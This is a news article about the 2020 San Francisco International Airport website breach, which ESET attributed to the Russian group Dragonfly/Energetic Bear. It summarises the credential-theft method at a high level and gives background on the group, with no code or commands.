Russian threat group suspected of hacking SFO

By Published: 14 Apr 2020 Russian state-sponsored threat actors are suspected to have hacked San Francisco’s airport last month. The San Francisco International Airport (SFO) disclosed a data breach last Tuesday that affected a number of employees and third-party contractors who accessed SFOConnect.com and SFOConstruction.com in March. While SFO did […]


Russian state-sponsored threat actors are suspected to have hacked San Francisco’s airport last month.

The San Francisco International Airport (SFO) disclosed a data breach last Tuesday that affected a number of employees and third-party contractors who accessed SFOConnect.com and SFOConstruction.com in March. While SFO did not offer any insight into who hacked the websites, researchers from antimalware vendor ESET this week said the breach appeared to be the work of a Russian APT known as Dragonfly/Energetic Bear.

The attackers utilized “malicious computer code” in order to steal select users’ Windows login credentials, according to the SFO’s breach notification.

“Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO,” the breach disclosure notice read.

ESET Research reported on Tuesday that the breach was “in line with the TTPs [tactics, techniques and procedures] of an APT group known as Dragonfly/Energetic Bear,” and that “The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix.”

After the malicious code was discovered, both websites were temporarily taken offline and the airport forced a reset of all “SFO related email and network passwords.”

SFO did not return SearchSecurity’s request for comment.

Dragonfly/Energetic Bear has been active since 2011. Initially the cyberespionage group targeted defense contractors, aviation companies and government agencies. In recent years, security researchers observed the group targeting critical infrastructure in the U.S. In 2017, Symantec reported a “Dragonfly 2.0” campaign was attempting to infiltrate the networks of energy companies.


Dig Deeper on Cyberespionage and nation-state cyberattacks

Rosa G. Rose

Next Post

Chief data officer role advances enterprise data governance

Wed Apr 15 , 2020
In the COVID-19 global pandemic era, organizations increasingly must be data-driven and agile. Enterprises also need to have the right processes and policies in place for enterprise data governance. In many organizations, the person in the chief data officer role (the CDO) is tasked with responsibility for data and enterprise […]